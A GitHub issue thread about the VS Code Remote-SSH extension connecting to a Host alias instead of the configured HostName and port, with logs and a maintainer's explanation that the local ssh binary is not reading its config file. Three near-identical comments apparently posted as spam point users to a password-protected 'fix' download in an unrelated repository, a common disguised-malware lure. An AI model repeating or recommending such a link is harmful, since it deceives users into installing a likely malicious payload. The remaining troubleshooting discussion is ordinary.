### ISSUE TITLE
[Remote-SSH Bug]: Try to connect to alias name in sshd_config instead of real host and port

### ISSUE THREAD

**Issue by yqs112358** [microsoft/vscode-remote-release#10198]
### Is there an existing issue for this bug?

- [X] I have searched the existing issues

### Required Troubleshooting Steps

- [X] I have followed these troubleshooting steps
- [X] I have tried both values of the `remote.SSH.useLocalServer` setting

### Connect Locally

It connects successfully

### Expected Behavior

The SSH works well

### Steps To Reproduce

1. My ssh config is at `C:\Users\<user-name>\.ssh\config`, with content like below:
```
Host some-server-name
  HostName 11.22.33.44
  User yqs112358
  Port 12345
  IdentityFile C:\Users\yqs11\Desktop\xxxxx.key
```
2. Ctrl+Shift+P, `Remote SSH: Connect to Host`, choose this server
3. Fail to connect. 
4. In console, it seems that Remote-SSH is trying to connect to `some-server-name` instead of given `HostName` and `Port` in ssh config file! It is ridiculous!

`[08:38:47.326] Running script with connection command: "C:\msys64\usr\bin\ssh.exe" -T -D 12345 "some-server-name" bash`

### Remote-SSH Log

<details>
<summary>Remote-SSH Log</summary>
<p>

```
[08:38:47.326] Running script with connection command: "C:\msys64\usr\bin\ssh.exe" -T -D 12345 "some-server-name" bash
[08:38:47.330] Terminal shell path: C:\WINDOWS\System32\cmd.exe
[08:38:50.355] > ssh: Could not resolve hostname tencent-server: Name or service not known
> 过程试图写入的管道不存在。
> ]0;C:\WINDOWS\System32\cmd.exe
[08:38:50.355] Got some output, clearing connection timeout
[08:38:51.660] "install" terminal command done
[08:38:51.661] Install terminal quit with output: ]0;C:\WINDOWS\System32\cmd.exe
[08:38:51.661] Received install output: ]0;C:\WINDOWS\System32\cmd.exe
[08:38:51.663] Failed to parse remote port from server output
[08:38:51.664] Resolver error: Error: 
	at m.Create (c:\Users\yqs11\.vscode\extensions\ms-vscode-remote.remote-ssh-0.113.1\out\extension.js:2:501230)
	at t.handleInstallOutput (c:\Users\yqs11\.vscode\extensions\ms-vscode-remote.remote-ssh-0.113.1\out\extension.js:2:498552)
	at t.tryInstall (c:\Users\yqs11\.vscode\extensions\ms-vscode-remote.remote-ssh-0.113.1\out\extension.js:2:623316)
	at async c:\Users\yqs11\.vscode\extensions\ms-vscode-remote.remote-ssh-0.113.1\out\extension.js:2:582788
	at async t.withShowDetailsEvent (c:\Users\yqs11\.vscode\extensions\ms-vscode-remote.remote-ssh-0.113.1\out\extension.js:2:586054)
	at async k (c:\Users\yqs11\.vscode\extensions\ms-vscode-remote.remote-ssh-0.113.1\out\extension.js:2:579675)
	at async t.resolve (c:\Users\yqs11\.vscode\extensions\ms-vscode-remote.remote-ssh-0.113.1\out\extension.js:2:583465)
	at async c:\Users\yqs11\.vscode\extensions\ms-vscode-remote.remote-ssh-0.113.1\out\extension.js:2:851126
[08:38:51.672] ------




[08:38:52.500] Opening exec server for ssh-remote+tencent-server
[08:38:52.537] Initizing new exec server for ssh-remote+tencent-server
[08:38:52.539] Using commit id "fee1edb8d6d72a0ddff41e5f71a671c23ed924b9" and quality "stable" for server
[08:38:52.541] Install and start server if needed
[08:38:53.205] getPlatformForHost was canceled
[08:38:53.205] Exec server for ssh-remote+tencent-server failed: Error: 已取消连接
[08:38:53.205] Error opening exec server for ssh-remote+tencent-server: Error: 已取消连接
```

</p>
</details>

### Anything else?

System: Windows 11 23H2
VSCode: v1.92.2
Remote - SSH: v0.113.1

**Comment by Amrithesh-k** [comment]
to fix your trouble check this fix, i see it in another issue,
https://github.com/aravinda-gamage/x86_64-win64-ranlib/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Amrithesh-k** [comment]
to fix your trouble check this fix, i see it in another issue,
https://github.com/aravinda-gamage/x86_64-win64-ranlib/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by telfaw** [comment]
to fix your trouble check this fix, i see it in another issue,
https://github.com/aravinda-gamage/x86_64-win64-ranlib/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by joshspicer** [comment]
Thanks for the issue. It is expected the your local SSH program is able to read the config file and connect via `Host` alias.  From your logs I see the following path for your install of SSH: `"C:\msys64\usr\bin\ssh.exe"`.  It seems like this `ssh` is not reading your config file, otherwise you could address the host by its `Host` alias.  You might see something interesting by running `ssh -v` or changing the VS Code logging to `debug`

You did not include your entire log, but at the top you should see a setting for SSH path, is that set to this SSH binary? If so, clearing it may help.


Do you have any other versions of `ssh` installed on your machine?  You'll want this command (from your log snippet) to succeed verbatim _outside_ of the Remote SSH extension:

```
<path-to-ssh.exe> -T -D 12345 "some-server-name" bash
```

For example, you may want to enable `OpenSSH Client`, which is a pretty standard implementation of SSH: https://geekrewind.com/how-to-install-openssh-client-in-windows-11/

**Comment by yqs112358** [comment]
Yeah, partly you're right. But I have found out that it's maybe another bug of Remote-SSH.

Actually, I have set the configuration item `Remote.SSH: Config File` to my ssh config file at `C:\Users\yqs11\.ssh\config`, but it seems that Remote-SSH does not add an `-F` param when calling `ssh.exe`, which maybe the cause of this problem.

I have tested the command `C:\msys64\usr\bin\ssh.exe -F C:\Users\yqs11\.ssh\config some-server-name` manually in my terminal, and it works well. 
<img width="635" alt="Image" src="https://github.com/user-attachments/assets/72f781b4-f3a6-476d-8cb2-9b4302f42cbf" />

And, when I remove the `-F` argument, then `ssh.exe` tells me `ssh: Could not resolve hostname tencent-server: Name or service not known`, just as what have shown in the error log in this issue.

**Comment by joshspicer** [comment]
Your machine's `ssh` program is responsible for reading from the config file.  In standard versions of `ssh`, there are several default locations that are looked at for configuration.  Here is the man page on my machine

```
    -F configfile
             Specifies an alternative per-user configuration file.  If a configuration file is
             given on the command line, the system-wide configuration file (/etc/ssh/ssh_config)
             will be ignored.  The default for the per-user configuration file is ~/.ssh/config.
             If set to “none”, no configuration files will be read.
```

I'd suggestion running the `ssh` command outside of VS Code with `-v` to see where your program is reading configuration from, and then going from there.  

<img width="760" alt="Image" src="https://github.com/user-attachments/assets/f626d0dc-9a95-4e55-97c9-3bbdc0f3baef" />



It seems  you're on the right path and we've determined this is not a bug in the extension.  If you are successful in connecting _outside_ of VS Code and then have issues with the extension, please feel free to open a new issue with your entire log output. Thanks!

**Comment by joshspicer** [comment]
Please note there is also a setting to override the default config paths (effectively passing that -F for you) in the extension itself.

(Copy-paste this into your browser to quickly open to this setting in VS Code: `vscode://settings/remote.SSH.configFile`)

<img width="390" alt="Image" src="https://github.com/user-attachments/assets/5d3948cc-a208-4cb4-bd3b-92f158bac9dc" />
